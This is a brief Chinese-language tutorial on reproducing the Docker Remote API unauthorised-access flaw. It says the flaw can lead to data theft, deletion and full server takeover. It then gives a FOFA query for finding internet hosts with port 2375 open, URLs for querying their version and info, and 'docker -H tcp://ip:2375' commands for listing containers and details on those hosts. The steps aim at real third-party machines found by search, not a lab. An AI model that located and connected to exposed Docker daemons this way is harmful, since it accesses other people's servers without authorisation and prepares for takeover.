Docker Remote API未授权访问漏洞复现
一、漏洞信息
Docker Remote API如配置不当可导致未授权访问,被攻击者恶意利⽤。攻击者⽆需认证即可访问到Docker数据,可能导致敏感信息泄露,⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感 信息,或对敏感⽂件进⾏修改,最终完全控制服务器。
二、漏洞复现
1.使用以下fofa语句对docker产品进行搜索:
port="2375"2.在搜索的结果网站后访问以下路径
http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息
3.可以使用-H参数连接目标主机的docker
docker -H tcp://ip:2375 ps #查看目标主机运行的镜像
docker -H tcp://ip:2375 version #查看目标主机的版本信息
docker -H tcp://ip:2375 info #查看目标主机的容器信息